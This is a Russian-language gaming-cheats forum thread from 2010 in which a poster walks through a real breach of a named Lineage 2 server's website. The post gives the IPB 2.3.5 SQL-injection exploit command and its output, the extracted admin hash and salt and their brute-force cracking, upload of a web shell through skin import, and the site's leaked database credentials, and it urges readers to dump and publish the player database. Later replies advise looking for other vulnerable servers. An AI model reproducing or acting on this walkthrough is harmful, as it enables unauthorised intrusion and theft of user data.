Вернуться   D3Scene.Ru Софт портал игр | Хаки | Проги | Статьи > Онлайн MMO игры > Lineage 2
Присоединяйся к нам

Lineage 2 Одна из популярнейших онлайн игр.



Ответ
 
Опции темы Опции просмотра
Старый 21.03.2010, 18:02   #1
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
Автор Сообщение

Рабочая уязвимость на сайте сервера из топ15 l2top


Все в одном ;)
[HIDE="3"]
Цитата:
Взлом паблик багой одного из сервера в топ15 л2топа.
Работает на данный момент.
Базу заливать не буду - сделаете как на видео - сами сольете
Сайт - STRESSWEB 9, форум IPB.
Онлайн ~1k
В итоге получаем полный доступ к базе сервера(рисуете шмот, ГМправа,да что хотите и сливаете бд ).
В архиве сам видеофайл .avi ~15минут и txt файл из видео.
Размер архива ~115mb
[Ссылки скрыты от гостей.] АЧ(с)
Работает на l2europe.net

Описание видиое с жука(с)
Цитата:
Простенькое видео о взломе lineage сервера через паблик уязвимость
Нам нужен сплоит для ipb 2.3.5 такой есть в паблике.
У меня он уже скачан, так что не важно
Я только что проделывал это, но для видео сделаю все еще раз.

Z:\usr\local\php5>php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки скрыты от гостей.] -uid 639 //строка запуска сплоита

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [20.03.2010 03:35:29]
+ [Ссылки скрыты от гостей.]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 639
/ Trying to get the password hash
+ pass_hash=f2a22f4ef46399fee58d5887b5623b88 - хэш пароля админа
+ Ok, using hash f2a22f4ef46399fee58d5887b5623b88
/ Trying to get the password salt
+ pass_salt=-Y,9? - соль
+ Ok, using salt -Y,9?
+ Enjoy!

+ [20.03.2010 03:35:41]
+ Total: 187

f2a22f4ef46399fee58d5887b5623b88:-Y,9?

теперь нам надо сбрутить это и получить пароль
я буду использовать EGB от insidepro, можно использовать и passwordsPRO

Настройки программы. Будем брутить только маленькие символы=) Авось повезет
; Standard character sets:
; ?d: 0123456789
; ?l: abcdefghijklmnopqrstuvwxyz
; ?u: ABCDEFGHIJKLMNOPQRSTUVWXYZ
; ?s: !@#$%^&*()`~-_=+\|[]{};:'",.<>/?
CharacterSet=?l

Все, пароль нашелся. Он был простой...

C:\music NEW\egb(2)\Новая папка>"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
f2a22f4ef46399fee58d5887b5623b88:ybrbnf

All passwords found!
C:\music NEW\egb(2)\Новая папка>


Теперь заходим админом на форум.

Теперь нужно залить шелл в админку

[Ссылки скрыты от гостей.] - тут описано как сделать это

качаем [Ссылки скрыты от гостей.] =)
теперь заливаем в админку.

Сделали по инструкции и залили шелл

Сообщение от c0m
В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
[Ссылки скрыты от гостей.]

[Ссылки скрыты от гостей.] - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал


вот и наш шелл) теперь надо найти пароль от бд и слить её.

Данные от БД
define("DBHOST","localhost");
define("DBUSER","l2biz_l2");
define("DBPASS","1q2w3e");
define("DBNAME","l2biz_l2");
define("COLLATE","utf8");

Я для удобства залью другой шелл, ибо МНЕ тяжело работать с этим, не привык
WSO2 так гораздо удобнее=)
Подключаемся к БД

Нашли информацию о базах L2 сервера)
Все мы в бд ла2, да кстати движок на сайте стоит STRESSWEB 9.
Все, сливаем базу и выкладываем на allcheats.ru
теперь стираем шеллы и идем спать.
Всем спасибо.
[/HIDE]
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Пользователь сказал cпасибо:
GaGa (21.03.2010)
Старый 22.03.2010, 10:56   #2
Рядовой
 
Аватар для Tempus3d2
 
Регистрация: 22.03.2010
Сообщений: 32
Репутация: 4
По умолчанию

[Ссылки скрыты от гостей.] ошибка:Forbidden

You don't have permission to access / on this server.
ваше не робит чтоле?
  Ответить с цитированием Наверх
Старый 22.03.2010, 10:58   #3
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
Автор По умолчанию

Просто его уже крякнули...
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Старый 22.03.2010, 11:00   #4
Рядовой
 
Аватар для Tempus3d2
 
Регистрация: 22.03.2010
Сообщений: 32
Репутация: 4
По умолчанию

тоесть фишка не работает больше?
или починят?
  Ответить с цитированием Наверх
Старый 22.03.2010, 11:01   #5
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
Автор По умолчанию

Tempus3d2, На данном серваке конечно закроют. Ищи другие..
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Старый 22.03.2010, 11:07   #6
Освоившийся

 
Аватар для FromShadow
 
Регистрация: 19.06.2009
Адрес: Киев
Сообщений: 322
Репутация: 336
По умолчанию

На то он и один из топ 15, что бы так быстро фиксить баги и закрывать дыры...
  Ответить с цитированием Наверх
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Перевод: zCarot | Дизайн: G-A | Верстка: OldEr
Текущее время: 03:00. Часовой пояс GMT +4.